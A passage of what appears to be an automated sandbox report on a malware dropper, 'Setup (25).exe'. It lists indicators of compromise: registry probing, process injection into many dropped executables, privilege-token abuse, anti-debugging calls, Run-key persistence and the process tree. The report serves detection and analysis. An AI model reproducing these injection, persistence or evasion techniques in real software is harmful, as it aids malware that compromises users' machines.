Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	Esplorarne.exe.com
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	Esplorarne.exe.com
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	Esplorarne.exe.com
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	Esplorarne.exe.com
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe

Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

2196 taskkill.exe
7500 taskkill.exe
240 taskkill.exe

pid	process
2196	taskkill.exe
7500	taskkill.exe
240	taskkill.exe

Modifies data under HKEY_USERS 43 IoCs

Processes:

sihclient.exesvchost.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	sihclient.exe
Key created	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	sihclient.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	sihclient.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	sihclient.exe

Modifies registry class 4 IoCs

Processes:

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\
Key created	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

7064 PING.EXE

pid	process
7064	PING.EXE

Script User-Agent 7 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	109	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	112	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	149	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	150	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	151	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	268	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	279	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Setup (25).exeE9uxgSdUeExu0bBngzBh_uQe.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	process
4780	Setup (25).exe
4780	Setup (25).exe
1468	E9uxgSdUeExu0bBngzBh_uQe.exe
1468	E9uxgSdUeExu0bBngzBh_uQe.exe
2064	WerFault.exe
2064	WerFault.exe
3048	WerFault.exe
3048	WerFault.exe
4752	WerFault.exe
4752	WerFault.exe
1544	WerFault.exe
1544	WerFault.exe
3256
3256
3256
3256
3256
3256
3256
3256
3256
3256
3256
3256
3256
3256
3256
3256
3256
3256
3256
3256
3256
3256
3256
3256
3256
3256
3256
3256
3256
3256
3256
3256
3256
3256
3256
3256
3256
3256
3256
3256
3256
3256
3256
3256
3256
3256
3256
3256
3256
3256
3256
3256

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

3256
Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

E9uxgSdUeExu0bBngzBh_uQe.exeo9ec8i3AuTv895w9Wwh2Xg7O.exe

pid process

1468 E9uxgSdUeExu0bBngzBh_uQe.exe
6224 o9ec8i3AuTv895w9Wwh2Xg7O.exe
Suspicious behavior: SetClipboardViewer 2 IoCs

Processes:

6922648.exe2381381.exe

pid process

4584 6922648.exe
1188 2381381.exe

pid	process
3256

pid	process
1468	E9uxgSdUeExu0bBngzBh_uQe.exe
6224	o9ec8i3AuTv895w9Wwh2Xg7O.exe

pid	process
4584	6922648.exe
1188	2381381.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

083SMkqix3FqkMg85qpCK4MO.exei_Sfffrx0pcajAzJVHowXGQm.exeHSVqsrxEPqSjn6UotLlealWj.exeWerFault.exeX4ZtF54lpE0bihtejzoN5wga.exe5448599.exeXLIX8_JGSKQGAWhbdi3LZOu9.exe3058653.exetaskkill.exeQj3Vdd8aLsc3UBukHlh8rpoV.exeACRS_7uZWaTP54klYeVeFN9k.exe3389790.exe

description	pid	process
Token: SeDebugPrivilege	3472	083SMkqix3FqkMg85qpCK4MO.exe
Token: SeDebugPrivilege	3756	i_Sfffrx0pcajAzJVHowXGQm.exe
Token: SeDebugPrivilege	4300	HSVqsrxEPqSjn6UotLlealWj.exe
Token: SeRestorePrivilege	2064	WerFault.exe
Token: SeBackupPrivilege	2064	WerFault.exe
Token: SeBackupPrivilege	2064	WerFault.exe
Token: SeShutdownPrivilege	3256
Token: SeCreatePagefilePrivilege	3256
Token: SeShutdownPrivilege	3256
Token: SeCreatePagefilePrivilege	3256
Token: SeShutdownPrivilege	3256
Token: SeCreatePagefilePrivilege	3256
Token: SeShutdownPrivilege	3256
Token: SeCreatePagefilePrivilege	3256
Token: SeShutdownPrivilege	3256
Token: SeCreatePagefilePrivilege	3256
Token: SeShutdownPrivilege	3256
Token: SeCreatePagefilePrivilege	3256
Token: SeShutdownPrivilege	3256
Token: SeCreatePagefilePrivilege	3256
Token: SeDebugPrivilege	4400	X4ZtF54lpE0bihtejzoN5wga.exe
Token: SeDebugPrivilege	4116	5448599.exe
Token: SeShutdownPrivilege	3256
Token: SeCreatePagefilePrivilege	3256
Token: SeShutdownPrivilege	3256
Token: SeCreatePagefilePrivilege	3256
Token: SeShutdownPrivilege	3256
Token: SeCreatePagefilePrivilege	3256
Token: SeShutdownPrivilege	3256
Token: SeCreatePagefilePrivilege	3256
Token: SeShutdownPrivilege	3256
Token: SeCreatePagefilePrivilege	3256
Token: SeShutdownPrivilege	3256
Token: SeCreatePagefilePrivilege	3256
Token: SeDebugPrivilege	3368	XLIX8_JGSKQGAWhbdi3LZOu9.exe
Token: SeShutdownPrivilege	3256
Token: SeCreatePagefilePrivilege	3256
Token: SeShutdownPrivilege	3256
Token: SeCreatePagefilePrivilege	3256
Token: SeDebugPrivilege	3228	3058653.exe
Token: SeShutdownPrivilege	3256
Token: SeCreatePagefilePrivilege	3256
Token: SeShutdownPrivilege	3256
Token: SeCreatePagefilePrivilege	3256
Token: SeShutdownPrivilege	3256
Token: SeCreatePagefilePrivilege	3256
Token: SeDebugPrivilege	2196	taskkill.exe
Token: SeDebugPrivilege	3236	Qj3Vdd8aLsc3UBukHlh8rpoV.exe
Token: SeDebugPrivilege	2716	ACRS_7uZWaTP54klYeVeFN9k.exe
Token: SeDebugPrivilege	1440	3389790.exe
Token: SeShutdownPrivilege	3256
Token: SeCreatePagefilePrivilege	3256
Token: SeShutdownPrivilege	3256
Token: SeCreatePagefilePrivilege	3256
Token: SeShutdownPrivilege	3256
Token: SeCreatePagefilePrivilege	3256
Token: SeShutdownPrivilege	3256
Token: SeCreatePagefilePrivilege	3256
Token: SeShutdownPrivilege	3256
Token: SeCreatePagefilePrivilege	3256
Token: SeShutdownPrivilege	3256
Token: SeCreatePagefilePrivilege	3256
Token: SeShutdownPrivilege	3256
Token: SeCreatePagefilePrivilege	3256

Suspicious use of FindShellTrayWindow 7 IoCs

Processes:

Cleaner Installation.exemask_svc.exeWEATHER Manager.tmpVPN.tmpDxRHLdhJwj2u6sxzhWkmB7cv.tmpEsplorarne.exe.com

pid process

3844
5864 Cleaner Installation.exe
5920 mask_svc.exe
4936 WEATHER Manager.tmp
5252 VPN.tmp
8168 DxRHLdhJwj2u6sxzhWkmB7cv.tmp
5612 Esplorarne.exe.com
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

E81F.exe

pid process

3836 E81F.exe

pid	process
3844
5864	Cleaner Installation.exe
5920	mask_svc.exe
4936	WEATHER Manager.tmp
5252	VPN.tmp
8168	DxRHLdhJwj2u6sxzhWkmB7cv.tmp
5612	Esplorarne.exe.com

pid	process
3836	E81F.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Setup (25).exeQj3Vdd8aLsc3UBukHlh8rpoV.exeIvsD8YnAp3LIEOWcKnb759Xn.exeACRS_7uZWaTP54klYeVeFN9k.exeE9uxgSdUeExu0bBngzBh_uQe.exe3058653.exeWerFault.exe3i32jFwvGUsnagmBNZ6q5sdi.exe

description	pid	process	target process
PID 4780 wrote to memory of 3084	4780	Setup (25).exe	woaKuS0Fa4P4IoV0phcyqAh5.exe
PID 4780 wrote to memory of 3084	4780	Setup (25).exe	woaKuS0Fa4P4IoV0phcyqAh5.exe
PID 4780 wrote to memory of 3084	4780	Setup (25).exe	woaKuS0Fa4P4IoV0phcyqAh5.exe
PID 4780 wrote to memory of 3368	4780	Setup (25).exe	XLIX8_JGSKQGAWhbdi3LZOu9.exe
PID 4780 wrote to memory of 3368	4780	Setup (25).exe	XLIX8_JGSKQGAWhbdi3LZOu9.exe
PID 4780 wrote to memory of 3368	4780	Setup (25).exe	XLIX8_JGSKQGAWhbdi3LZOu9.exe
PID 4780 wrote to memory of 3544	4780	Setup (25).exe	Wd5nvHmhtHnI5kFLdztgjHb9.exe
PID 4780 wrote to memory of 3544	4780	Setup (25).exe	Wd5nvHmhtHnI5kFLdztgjHb9.exe
PID 4780 wrote to memory of 3544	4780	Setup (25).exe	Wd5nvHmhtHnI5kFLdztgjHb9.exe
PID 4780 wrote to memory of 3752	4780	Setup (25).exe	2zjnGup_q5N69USduMS__gOT.exe
PID 4780 wrote to memory of 3752	4780	Setup (25).exe	2zjnGup_q5N69USduMS__gOT.exe
PID 4780 wrote to memory of 3752	4780	Setup (25).exe	2zjnGup_q5N69USduMS__gOT.exe
PID 4780 wrote to memory of 3756	4780	Setup (25).exe	i_Sfffrx0pcajAzJVHowXGQm.exe
PID 4780 wrote to memory of 3756	4780	Setup (25).exe	i_Sfffrx0pcajAzJVHowXGQm.exe
PID 4780 wrote to memory of 3984	4780	Setup (25).exe	E9uxgSdUeExu0bBngzBh_uQe.exe
PID 4780 wrote to memory of 3984	4780	Setup (25).exe	E9uxgSdUeExu0bBngzBh_uQe.exe
PID 4780 wrote to memory of 3984	4780	Setup (25).exe	E9uxgSdUeExu0bBngzBh_uQe.exe
PID 4780 wrote to memory of 4300	4780	Setup (25).exe	HSVqsrxEPqSjn6UotLlealWj.exe
PID 4780 wrote to memory of 4300	4780	Setup (25).exe	HSVqsrxEPqSjn6UotLlealWj.exe
PID 4780 wrote to memory of 4300	4780	Setup (25).exe	HSVqsrxEPqSjn6UotLlealWj.exe
PID 4780 wrote to memory of 4400	4780	Setup (25).exe	X4ZtF54lpE0bihtejzoN5wga.exe
PID 4780 wrote to memory of 4400	4780	Setup (25).exe	X4ZtF54lpE0bihtejzoN5wga.exe
PID 4780 wrote to memory of 4400	4780	Setup (25).exe	X4ZtF54lpE0bihtejzoN5wga.exe
PID 4780 wrote to memory of 4508	4780	Setup (25).exe	Qj3Vdd8aLsc3UBukHlh8rpoV.exe
PID 4780 wrote to memory of 4508	4780	Setup (25).exe	Qj3Vdd8aLsc3UBukHlh8rpoV.exe
PID 4780 wrote to memory of 4508	4780	Setup (25).exe	Qj3Vdd8aLsc3UBukHlh8rpoV.exe
PID 4780 wrote to memory of 3472	4780	Setup (25).exe	083SMkqix3FqkMg85qpCK4MO.exe
PID 4780 wrote to memory of 3472	4780	Setup (25).exe	083SMkqix3FqkMg85qpCK4MO.exe
PID 4780 wrote to memory of 4336	4780	Setup (25).exe	ACRS_7uZWaTP54klYeVeFN9k.exe
PID 4780 wrote to memory of 4336	4780	Setup (25).exe	ACRS_7uZWaTP54klYeVeFN9k.exe
PID 4780 wrote to memory of 4336	4780	Setup (25).exe	ACRS_7uZWaTP54klYeVeFN9k.exe
PID 4780 wrote to memory of 4480	4780	Setup (25).exe	yRMdFeafclg2dc1Ry1n9sNsz.exe
PID 4780 wrote to memory of 4480	4780	Setup (25).exe	yRMdFeafclg2dc1Ry1n9sNsz.exe
PID 4780 wrote to memory of 4480	4780	Setup (25).exe	yRMdFeafclg2dc1Ry1n9sNsz.exe
PID 4780 wrote to memory of 3208	4780	Setup (25).exe	OgKA_pM_PTN4I5VVgtdfwxiQ.exe
PID 4780 wrote to memory of 3208	4780	Setup (25).exe	OgKA_pM_PTN4I5VVgtdfwxiQ.exe
PID 4780 wrote to memory of 3208	4780	Setup (25).exe	OgKA_pM_PTN4I5VVgtdfwxiQ.exe
PID 4780 wrote to memory of 3000	4780	Setup (25).exe	IvsD8YnAp3LIEOWcKnb759Xn.exe
PID 4780 wrote to memory of 3000	4780	Setup (25).exe	IvsD8YnAp3LIEOWcKnb759Xn.exe
PID 4780 wrote to memory of 3000	4780	Setup (25).exe	IvsD8YnAp3LIEOWcKnb759Xn.exe
PID 4508 wrote to memory of 3236	4508	Qj3Vdd8aLsc3UBukHlh8rpoV.exe	Qj3Vdd8aLsc3UBukHlh8rpoV.exe
PID 4508 wrote to memory of 3236	4508	Qj3Vdd8aLsc3UBukHlh8rpoV.exe	Qj3Vdd8aLsc3UBukHlh8rpoV.exe
PID 4508 wrote to memory of 3236	4508	Qj3Vdd8aLsc3UBukHlh8rpoV.exe	Qj3Vdd8aLsc3UBukHlh8rpoV.exe
PID 3000 wrote to memory of 2704	3000	IvsD8YnAp3LIEOWcKnb759Xn.exe	IvsD8YnAp3LIEOWcKnb759Xn.exe
PID 3000 wrote to memory of 2704	3000	IvsD8YnAp3LIEOWcKnb759Xn.exe	IvsD8YnAp3LIEOWcKnb759Xn.exe
PID 3000 wrote to memory of 2704	3000	IvsD8YnAp3LIEOWcKnb759Xn.exe	IvsD8YnAp3LIEOWcKnb759Xn.exe
PID 4336 wrote to memory of 2716	4336	ACRS_7uZWaTP54klYeVeFN9k.exe	ACRS_7uZWaTP54klYeVeFN9k.exe
PID 4336 wrote to memory of 2716	4336	ACRS_7uZWaTP54klYeVeFN9k.exe	ACRS_7uZWaTP54klYeVeFN9k.exe
PID 4336 wrote to memory of 2716	4336	ACRS_7uZWaTP54klYeVeFN9k.exe	ACRS_7uZWaTP54klYeVeFN9k.exe
PID 3984 wrote to memory of 1468	3984	E9uxgSdUeExu0bBngzBh_uQe.exe	E9uxgSdUeExu0bBngzBh_uQe.exe
PID 3984 wrote to memory of 1468	3984	E9uxgSdUeExu0bBngzBh_uQe.exe	E9uxgSdUeExu0bBngzBh_uQe.exe
PID 3984 wrote to memory of 1468	3984	E9uxgSdUeExu0bBngzBh_uQe.exe	E9uxgSdUeExu0bBngzBh_uQe.exe
PID 3984 wrote to memory of 1468	3984	E9uxgSdUeExu0bBngzBh_uQe.exe	E9uxgSdUeExu0bBngzBh_uQe.exe
PID 3984 wrote to memory of 1468	3984	E9uxgSdUeExu0bBngzBh_uQe.exe	E9uxgSdUeExu0bBngzBh_uQe.exe
PID 3984 wrote to memory of 1468	3984	E9uxgSdUeExu0bBngzBh_uQe.exe	E9uxgSdUeExu0bBngzBh_uQe.exe
PID 4780 wrote to memory of 3632	4780	Setup (25).exe	B1DSbHQ4kUH40QHuC2yUXfLG.exe
PID 4780 wrote to memory of 3632	4780	Setup (25).exe	B1DSbHQ4kUH40QHuC2yUXfLG.exe
PID 4780 wrote to memory of 3632	4780	Setup (25).exe	B1DSbHQ4kUH40QHuC2yUXfLG.exe
PID 3228 wrote to memory of 3208	3228	3058653.exe	OgKA_pM_PTN4I5VVgtdfwxiQ.exe
PID 3228 wrote to memory of 3208	3228	3058653.exe	OgKA_pM_PTN4I5VVgtdfwxiQ.exe
PID 5100 wrote to memory of 3084	5100	WerFault.exe	woaKuS0Fa4P4IoV0phcyqAh5.exe
PID 5100 wrote to memory of 3084	5100	WerFault.exe	woaKuS0Fa4P4IoV0phcyqAh5.exe
PID 4036 wrote to memory of 4480	4036	3i32jFwvGUsnagmBNZ6q5sdi.exe	yRMdFeafclg2dc1Ry1n9sNsz.exe
PID 4036 wrote to memory of 4480	4036	3i32jFwvGUsnagmBNZ6q5sdi.exe	yRMdFeafclg2dc1Ry1n9sNsz.exe

C:\Users\Admin\AppData\Local\Temp\Setup (25).exe
"C:\Users\Admin\AppData\Local\Temp\Setup (25).exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4780

C:\Users\Admin\Documents\woaKuS0Fa4P4IoV0phcyqAh5.exe
"C:\Users\Admin\Documents\woaKuS0Fa4P4IoV0phcyqAh5.exe"
2⤵
- Executes dropped EXE
PID:3084

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3084 -s 316
3⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:3048

C:\Users\Admin\Documents\E9uxgSdUeExu0bBngzBh_uQe.exe
"C:\Users\Admin\Documents\E9uxgSdUeExu0bBngzBh_uQe.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3984

C:\Users\Admin\Documents\E9uxgSdUeExu0bBngzBh_uQe.exe
"C:\Users\Admin\Documents\E9uxgSdUeExu0bBngzBh_uQe.exe"
3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1468

C:\Users\Admin\Documents\i_Sfffrx0pcajAzJVHowXGQm.exe
"C:\Users\Admin\Documents\i_Sfffrx0pcajAzJVHowXGQm.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3756

C:\Users\Admin\AppData\Roaming\5448599.exe
"C:\Users\Admin\AppData\Roaming\5448599.exe"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4116

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4116 -s 2344
4⤵
- Executes dropped EXE
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:912

C:\Users\Admin\AppData\Roaming\6565577.exe
"C:\Users\Admin\AppData\Roaming\6565577.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4924

C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
4⤵
- Executes dropped EXE
PID:4912

C:\Users\Admin\AppData\Roaming\3389790.exe
"C:\Users\Admin\AppData\Roaming\3389790.exe"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1440

C:\Users\Admin\AppData\Roaming\3058653.exe
"C:\Users\Admin\AppData\Roaming\3058653.exe"
3⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3228

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3228 -s 2436
4⤵
- Program crash
PID:7948

C:\Users\Admin\Documents\2zjnGup_q5N69USduMS__gOT.exe
"C:\Users\Admin\Documents\2zjnGup_q5N69USduMS__gOT.exe"
2⤵
- Executes dropped EXE
PID:3752

C:\Users\Admin\Documents\Wd5nvHmhtHnI5kFLdztgjHb9.exe
"C:\Users\Admin\Documents\Wd5nvHmhtHnI5kFLdztgjHb9.exe"
2⤵
- Executes dropped EXE
PID:3544

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3544 -s 312
3⤵
- Program crash
PID:1544

C:\Users\Admin\Documents\XLIX8_JGSKQGAWhbdi3LZOu9.exe
"C:\Users\Admin\Documents\XLIX8_JGSKQGAWhbdi3LZOu9.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:3368

C:\Users\Admin\Documents\HSVqsrxEPqSjn6UotLlealWj.exe
"C:\Users\Admin\Documents\HSVqsrxEPqSjn6UotLlealWj.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:4300

C:\Users\Admin\Documents\HSVqsrxEPqSjn6UotLlealWj.exe
"C:\Users\Admin\Documents\HSVqsrxEPqSjn6UotLlealWj.exe"
3⤵
- Executes dropped EXE
PID:2016

C:\Users\Admin\Documents\Qj3Vdd8aLsc3UBukHlh8rpoV.exe
"C:\Users\Admin\Documents\Qj3Vdd8aLsc3UBukHlh8rpoV.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4508

C:\Users\Admin\Documents\Qj3Vdd8aLsc3UBukHlh8rpoV.exe
C:\Users\Admin\Documents\Qj3Vdd8aLsc3UBukHlh8rpoV.exe
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3236

C:\Users\Admin\Documents\X4ZtF54lpE0bihtejzoN5wga.exe
"C:\Users\Admin\Documents\X4ZtF54lpE0bihtejzoN5wga.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:4400

C:\Users\Admin\Documents\ACRS_7uZWaTP54klYeVeFN9k.exe
"C:\Users\Admin\Documents\ACRS_7uZWaTP54klYeVeFN9k.exe"
2⤵
